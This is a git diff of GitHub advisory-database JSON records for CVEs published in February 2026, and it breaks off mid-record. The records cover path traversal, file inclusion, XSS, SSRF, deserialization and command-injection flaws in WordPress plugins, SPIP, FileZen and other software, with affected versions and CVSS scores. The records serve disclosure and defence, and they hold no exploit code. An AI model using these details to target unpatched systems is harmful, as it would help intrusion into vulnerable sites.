b/advisories/unreviewed/2026/02/GHSA-q7wp-4j7p-g4vj/GHSA-q7wp-4j7p-g4vj.json new file mode 100644 index 0000000000000..0c1f57574dbb5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q7wp-4j7p-g4vj/GHSA-q7wp-4j7p-g4vj.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q7wp-4j7p-g4vj", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2419" + ], + "details": "The WP-DownloadManager plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.69 via the 'download_path' configuration parameter. This is due to insufficient validation of the download path setting, which allows directory traversal sequences to bypass the WP_CONTENT_DIR prefix check. This makes it possible for authenticated attackers, with Administrator-level access and above, to configure the plugin to list and access arbitrary files on the server by exploiting the file browser functionality.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2419" + }, + { + "type": "WEB", + "url": "https://github.com/lesterchan/wp-downloadmanager/commit/416b9f5459496166c0395f9e055d4c4cf872404a" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/tags/1.69/download-options.php#L42" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/trunk/download-options.php#L42" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0bb96da1-9c17-4264-ac29-b5ff8dec745d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q8m6-hjhf-m246/GHSA-q8m6-hjhf-m246.json b/advisories/unreviewed/2026/02/GHSA-q8m6-hjhf-m246/GHSA-q8m6-hjhf-m246.json new file mode 100644 index 0000000000000..02d5d01f65136 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q8m6-hjhf-m246/GHSA-q8m6-hjhf-m246.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q8m6-hjhf-m246", + "modified": "2026-02-19T21:30:48Z", + "published": "2026-02-19T21:30:48Z", + "aliases": [ + "CVE-2026-27343" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in VanKarWai Airtifact airtifact allows PHP Local File Inclusion.This issue affects Airtifact: from n/a through <= 1.2.91.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27343" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/airtifact/vulnerability/wordpress-airtifact-theme-1-2-91-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T21:18:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q8w6-j65f-cxr6/GHSA-q8w6-j65f-cxr6.json b/advisories/unreviewed/2026/02/GHSA-q8w6-j65f-cxr6/GHSA-q8w6-j65f-cxr6.json index df4a295ca3fcb..f1a8f70bcdaf2 100644 --- a/advisories/unreviewed/2026/02/GHSA-q8w6-j65f-cxr6/GHSA-q8w6-j65f-cxr6.json +++ b/advisories/unreviewed/2026/02/GHSA-q8w6-j65f-cxr6/GHSA-q8w6-j65f-cxr6.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-78" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-q8wh-g4r2-jgrq/GHSA-q8wh-g4r2-jgrq.json b/advisories/unreviewed/2026/02/GHSA-q8wh-g4r2-jgrq/GHSA-q8wh-g4r2-jgrq.json new file mode 100644 index 0000000000000..1f00ea1e31b2d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q8wh-g4r2-jgrq/GHSA-q8wh-g4r2-jgrq.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q8wh-g4r2-jgrq", + "modified": "2026-02-14T09:31:33Z", + "published": "2026-02-14T09:31:33Z", + "aliases": [ + "CVE-2026-1901" + ], + "details": "The QuestionPro Surveys plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'questionpro' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1901" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/questionpro-surveys/tags/1.0/index.php#L31" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/questionpro-surveys/trunk/index.php#L31" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3121bb03-7bc0-4005-9814-bc46ce9d4a9d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T07:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q8wj-qfj9-vjfp/GHSA-q8wj-qfj9-vjfp.json b/advisories/unreviewed/2026/02/GHSA-q8wj-qfj9-vjfp/GHSA-q8wj-qfj9-vjfp.json new file mode 100644 index 0000000000000..d998ab080a321 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q8wj-qfj9-vjfp/GHSA-q8wj-qfj9-vjfp.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q8wj-qfj9-vjfp", + "modified": "2026-02-14T18:30:15Z", + "published": "2026-02-14T18:30:15Z", + "aliases": [ + "CVE-2026-23158" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ngpio: virtuser: fix UAF in configfs release path\n\nThe gpio-virtuser configfs release path uses guard(mutex) to protect\nthe device structure. However, the device is freed before the guard\ncleanup runs, causing mutex_unlock() to operate on freed memory.\n\nSpecifically, gpio_virtuser_device_config_group_release() destroys\nthe mutex and frees the device while still inside the guard(mutex)\nscope. When the function returns, the guard cleanup invokes\nmutex_unlock(&dev->lock), resulting in a slab use-after-free.\n\nLimit the mutex lifetime by using a scoped_guard() only around the\nactivation check, so that the lock is released before mutex_destroy()\nand kfree() are called.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23158" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/53ad4a948a4586359b841d607c08fb16c5503230" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7bec90f605cfb138006f5ba575f2310593347110" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/815a8e3bf72811d402b30bd4a53cde5e9df7a563" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T16:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q922-v4r9-2x72/GHSA-q922-v4r9-2x72.json b/advisories/unreviewed/2026/02/GHSA-q922-v4r9-2x72/GHSA-q922-v4r9-2x72.json index 83dff9b960a77..986eac1cf787b 100644 --- a/advisories/unreviewed/2026/02/GHSA-q922-v4r9-2x72/GHSA-q922-v4r9-2x72.json +++ b/advisories/unreviewed/2026/02/GHSA-q922-v4r9-2x72/GHSA-q922-v4r9-2x72.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-78" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-q93j-qg8p-98hf/GHSA-q93j-qg8p-98hf.json b/advisories/unreviewed/2026/02/GHSA-q93j-qg8p-98hf/GHSA-q93j-qg8p-98hf.json new file mode 100644 index 0000000000000..4701ff908547d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q93j-qg8p-98hf/GHSA-q93j-qg8p-98hf.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q93j-qg8p-98hf", + "modified": "2026-02-13T21:31:36Z", + "published": "2026-02-13T21:31:36Z", + "aliases": [ + "CVE-2025-20066" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-20066" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qc7g-qpr2-qpjj/GHSA-qc7g-qpr2-qpjj.json b/advisories/unreviewed/2026/02/GHSA-qc7g-qpr2-qpjj/GHSA-qc7g-qpr2-qpjj.json new file mode 100644 index 0000000000000..60dcf969ccebe --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qc7g-qpr2-qpjj/GHSA-qc7g-qpr2-qpjj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qc7g-qpr2-qpjj", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-33130" + ], + "details": "IBM DB2 Merge Backup for Linux, UNIX and Windows 12.1.0.0 could allow an authenticated user to cause the program to crash due to a buffer being overwritten when it is allocated on the stack.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33130" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260043" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qc95-pwfh-96qq/GHSA-qc95-pwfh-96qq.json b/advisories/unreviewed/2026/02/GHSA-qc95-pwfh-96qq/GHSA-qc95-pwfh-96qq.json new file mode 100644 index 0000000000000..a66774b0e4ce1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qc95-pwfh-96qq/GHSA-qc95-pwfh-96qq.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qc95-pwfh-96qq", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-12375" + ], + "details": "The Printful Integration for WooCommerce plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.2.11 via the advanced size chart REST API endpoint. This is due to insufficient validation of user-supplied URLs before passing them to the download_url() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12375" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/printful-shipping-for-woocommerce/tags/2.2.11/includes/class-printful-rest-api-controller.php#L259" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/printful-shipping-for-woocommerce/tags/2.2.11/includes/class-printful-rest-api-controller.php#L67" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/printful-shipping-for-woocommerce/tags/2.2.11/includes/class-printful-size-guide.php#L170" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/printful-shipping-for-woocommerce/tags/2.2.11/includes/class-printful-size-guide.php#L210" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3439592%40printful-shipping-for-woocommerce&new=3439592%40printful-shipping-for-woocommerce&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4cb410aa-3941-4e19-8de4-622a94766ee8?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qcc6-w9r3-h3c3/GHSA-qcc6-w9r3-h3c3.json b/advisories/unreviewed/2026/02/GHSA-qcc6-w9r3-h3c3/GHSA-qcc6-w9r3-h3c3.json new file mode 100644 index 0000000000000..a648b6932f628 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qcc6-w9r3-h3c3/GHSA-qcc6-w9r3-h3c3.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qcc6-w9r3-h3c3", + "modified": "2026-02-16T18:31:29Z", + "published": "2026-02-16T18:31:29Z", + "aliases": [ + "CVE-2019-25394" + ], + "details": "Smoothwall Express 3.1-SP4-polar-x86_64-update9 contains multiple stored cross-site scripting vulnerabilities in the modem.cgi script that allow attackers to inject malicious scripts through POST parameters. Attackers can submit crafted payloads in parameters like INIT, HANGUP, SPEAKER_ON, SPEAKER_OFF, TONE_DIAL, and PULSE_DIAL to execute arbitrary JavaScript in users' browsers when the stored data is retrieved.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25394" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46333" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/smoothwall-express-modemcgi-cross-site-scripting" + }, + { + "type": "WEB", + "url": "http://www.smoothwall.org" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-16T18:19:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qcw5-f875-rfvw/GHSA-qcw5-f875-rfvw.json b/advisories/unreviewed/2026/02/GHSA-qcw5-f875-rfvw/GHSA-qcw5-f875-rfvw.json new file mode 100644 index 0000000000000..d576b2d32c852 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qcw5-f875-rfvw/GHSA-qcw5-f875-rfvw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qcw5-f875-rfvw", + "modified": "2026-02-17T15:31:35Z", + "published": "2026-02-17T15:31:35Z", + "aliases": [ + "CVE-2022-41650" + ], + "details": "Missing Authorization vulnerability in Paul Custom Content by Country (by Shield Security) custom-content-by-country.This issue affects Custom Content by Country (by Shield Security): from n/a through 3.1.2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41650" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/custom-content-by-country/vulnerability/wordpress-custom-content-by-country-plugin-3-1-2-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T15:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qfch-9m87-pgm2/GHSA-qfch-9m87-pgm2.json b/advisories/unreviewed/2026/02/GHSA-qfch-9m87-pgm2/GHSA-qfch-9m87-pgm2.json new file mode 100644 index 0000000000000..f9f4f8ef193ed --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qfch-9m87-pgm2/GHSA-qfch-9m87-pgm2.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qfch-9m87-pgm2", + "modified": "2026-02-19T18:31:54Z", + "published": "2026-02-19T18:31:54Z", + "aliases": [ + "CVE-2025-71250" + ], + "details": "SPIP before 4.4.9 allows Insecure Deserialization in the public area through the table_valeur filter and the DATA iterator, which accept serialized data. An attacker who can place malicious serialized content (a pre-condition requiring prior access or another vulnerability) can trigger arbitrary object instantiation and potentially achieve code execution. The use of serialized data in these components has been deprecated and will be removed in SPIP 5. This vulnerability is not mitigated by the SPIP security screen.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71250" + }, + { + "type": "WEB", + "url": "https://blog.spip.net/Mise-a-jour-de-securite-sortie-de-SPIP-4-4-9.html" + }, + { + "type": "WEB", + "url": "https://git.spip.net/spip/spip" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spip-insecure-deserialization" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T16:27:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qfj5-5f6w-g7w2/GHSA-qfj5-5f6w-g7w2.json b/advisories/unreviewed/2026/02/GHSA-qfj5-5f6w-g7w2/GHSA-qfj5-5f6w-g7w2.json new file mode 100644 index 0000000000000..5eec7230b10e3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qfj5-5f6w-g7w2/GHSA-qfj5-5f6w-g7w2.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qfj5-5f6w-g7w2", + "modified": "2026-02-13T21:31:38Z", + "published": "2026-02-13T21:31:38Z", + "aliases": [ + "CVE-2025-32733" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32733" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json b/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json new file mode 100644 index 0000000000000..8b16527cca469 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qfwf-756h-2p4g", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2644" + ], + "details": "A weakness has been identified in niklasso minisat up to 2.2.0. This issue affects the function Solver::value in the library core/SolverTypes.h of the component DIMACS File Parser. This manipulation of the argument variable index with the input 2147483648 causes out-of-bounds read. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2644" + }, + { + "type": "WEB", + "url": "https://github.com/niklasso/minisat/issues/55" + }, + { + "type": "WEB", + "url": "https://github.com/niklasso/minisat/issues/55#issue-3832527387" + }, + { + "type": "WEB", + "url": "https://github.com/niklasso/minisat" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346406" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346406" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752775" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qg3j-47pf-jpxw/GHSA-qg3j-47pf-jpxw.json b/advisories/unreviewed/2026/02/GHSA-qg3j-47pf-jpxw/GHSA-qg3j-47pf-jpxw.json new file mode 100644 index 0000000000000..7170f5fe40b46 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qg3j-47pf-jpxw/GHSA-qg3j-47pf-jpxw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qg3j-47pf-jpxw", + "modified": "2026-02-12T21:31:28Z", + "published": "2026-02-12T21:31:28Z", + "aliases": [ + "CVE-2026-0619" + ], + "details": "A reachable infinite loop via an integer wraparound is present in Silicon Labs' Matter SDK which allows an attacker to trigger a denial of service. A hard reset is required to recover the device.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0619" + }, + { + "type": "WEB", + "url": "https://community.silabs.com/068Vm00000gUB2g" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-190" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T21:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qg96-wxg3-3x3h/GHSA-qg96-wxg3-3x3h.json b/advisories/unreviewed/2026/02/GHSA-qg96-wxg3-3x3h/GHSA-qg96-wxg3-3x3h.json new file mode 100644 index 0000000000000..ed93c7c35f468 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qg96-wxg3-3x3h/GHSA-qg96-wxg3-3x3h.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qg96-wxg3-3x3h", + "modified": "2026-02-12T18:30:22Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20625" + ], + "details": "A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3, macOS Sonoma 14.8.4, visionOS 26.3. An app may be able to access sensitive user data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20625" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qgqm-fpvv-jgfh/GHSA-qgqm-fpvv-jgfh.json b/advisories/unreviewed/2026/02/GHSA-qgqm-fpvv-jgfh/GHSA-qgqm-fpvv-jgfh.json new file mode 100644 index 0000000000000..2a6a2b4a0c8b0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qgqm-fpvv-jgfh/GHSA-qgqm-fpvv-jgfh.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qgqm-fpvv-jgfh", + "modified": "2026-02-13T06:30:48Z", + "published": "2026-02-13T06:30:48Z", + "aliases": [ + "CVE-2026-25108" + ], + "details": "FileZen contains an OS command injection vulnerability. When FileZen Antivirus Check Option is enabled, a logged-in user may send a specially crafted HTTP request to execute an arbitrary OS command.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25108" + }, + { + "type": "WEB", + "url": "https://jvn.jp/en/jp/JVN84622767" + }, + { + "type": "WEB", + "url": "https://www.soliton.co.jp/support/2026/006657.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T04:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qh7q-x454-phcx/GHSA-qh7q-x454-phcx.json b/advisories/unreviewed/2026/02/GHSA-qh7q-x454-phcx/GHSA-qh7q-x454-phcx.json index 934e9cc10c71b..fdbaa8d0d874f 100644 --- a/advisories/unreviewed/2026/02/GHSA-qh7q-x454-phcx/GHSA-qh7q-x454-phcx.json +++ b/advisories/unreviewed/2026/02/GHSA-qh7q-x454-phcx/GHSA-qh7q-x454-phcx.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-qh7q-x454-phcx", - "modified": "2026-02-03T18:30:47Z", + "modified": "2026-02-13T21:31:33Z", "published": "2026-02-03T18:30:47Z", "aliases": [ "CVE-2026-22228" ], "details": "An authenticated user with high privileges may trigger a denial‑of‑service condition in TP-Link Archer BE230 v1.2 by restoring a crafted configuration file containing an excessively long parameter. Restoring such a file can cause the device to become unresponsive, requiring a reboot to restore normal operation.\nThis issue affects Archer BE230 v1.2 < 1.2.4 Build 20251218 rel.70420.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-qhpc-j29f-q7jq/GHSA-qhpc-j29f-q7jq.json b/advisories/unreviewed/2026/02/GHSA-qhpc-j29f-q7jq/GHSA-qhpc-j29f-q7jq.json new file mode 100644 index 0000000000000..5953f2030acf0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qhpc-j29f-q7jq/GHSA-qhpc-j29f-q7jq.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qhpc-j29f-q7jq", + "modified": 